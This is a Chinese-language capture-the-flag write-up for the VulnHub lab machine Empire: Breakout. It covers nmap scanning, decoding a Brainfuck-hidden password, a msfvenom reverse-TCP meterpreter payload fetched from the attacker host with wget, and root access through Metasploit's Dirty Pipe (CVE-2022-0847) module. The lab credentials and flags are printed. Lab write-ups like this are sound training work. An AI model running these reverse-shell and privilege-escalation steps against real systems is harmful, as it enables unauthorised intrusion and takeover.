Lingjing(灵境)+vulnhub:Empire_Breakout打靶记录

灵境平台项目地址

nullhttps://github.com/414aaj/LingJing

安装教程

(Lingling)灵境靶场安装及使用教程(windows和linux)-CSDN博客文章浏览阅读2.3k次,点赞28次,收藏23次。(Lingling)灵境靶场安装教程(windows和linux)_灵境靶场https://blog.csdn.net/2301_78519654/article/details/153920708?spm=1001.2014.3001.5502

测试环境

靶机描述见下方图片

靶机ip: 192.168.242.230

攻击机ip:192.168.188.146

开始

扫描ip

nmap -Pn -O -sV 192.168.242.230

发现80,139,445,10000,20000,端口

80端口网页检查源代码发现

<!-- don't worry no one will get here, it's safe to share with you my access. Its encrypted :) ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++. -->

在网上找个brainfuck在运行输出看到

.2uqPEfj3D<P'a-3

判断这可能是个密码,拿到10000,20000端口的web发现需要用户名,尝试常用的用户名均无果,

使用enum4linux工具枚举用户名

enum4linux 192.168.242.230

要输入密码的时候输入

.2uqPEfj3D<P'a-3

得到用户名cyber

使用用户名cyber密码.2uqPEfj3D<P'a-3去20000的web服务登陆

左下角有个模拟终端,可以直接执行命令,但是权限不是root所以需要进行提权,这里为了方便使用msf

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=攻击机ip LPORT=反弹端口 -f elf -o shell.elf

使用http服务传输shell.elf

python3 -m http.server 8888

在网页的虚拟终端执行

wget http://攻击机ip:端口/shell.elf chmod +x shell.elf

在攻击机开启监听

msfconsole use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST 192.168.188.146 set LPORT 3333 run #在web网页的终端执行 ./shell.elf

成功建立会话,现在开始提权,

background use post/multi/recon/local_exploit_suggester set SESSION 1 run

检测出来可利用的模块

# Name Potentially Vulnerable? Check Result - ---- ----------------------- ------------ 1 exploit/linux/local/cve_2022_0847_dirtypipe Yes The target appears to be vulnerable. Linux kernel version found: 5.10.0 2 exploit/linux/local/cve_2022_0995_watch_queue Yes The target appears to be vulnerable. Kernel version 5.10.0 appears to be vulnerable 3 exploit/linux/local/glibc_tunables_priv_esc Yes The target appears to be vulnerable. The glibc version (2.31-13+deb11u2) found on the target appears to be vulnerable 4 exploit/linux/local/netfilter_nft_set_elem_init_privesc Yes The target appears to be vulnerable. The kernel 5 appears to be vulnerable, but no offsets are available for this version 5 exploit/linux/local/netfilter_priv_esc_ipv4 Yes The target appears to be vulnerable. Target appears to be vulnerable 6 exploit/linux/local/su_login Yes The target appears to be vulnerable. Target appears to be vulnerable 7 exploit/linux/persistence/bash_profile Yes The service is running, but could not be validated. Bash profile exists and is writable: /home/cyber/.bashrc 8 exploit/linux/persistence/init_systemd Yes The target appears to be vulnerable. /tmp/ is writable and system is systemd based 9 exploit/multi/persistence/cron Yes The target appears to be vulnerable. Cron timing is valid, no cron.deny entries found

使用第一个模块cve_2022_0847

use exploit/linux/local/cve_2022_0847_dirtypipe set SESSION 1 set LHOST 192.168.188.146 set LPORT 7777 run

成功提权至root,两个flag分别在/home/cyber和/root

3mp!r3{You_Manage_To_Break_To_My_Secure_Access} 3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}

总结

这个机器网上说的是用普通用户目录下的tar去读取/var/backups/下的.old_pass.bak文件,读取出来的值是Ts&4&YurgtRX(=~h网上说可以用来登陆root用户,但是我尝试之后发现没有,于是使用msf扫描,最后提权的,有疑问的可以留言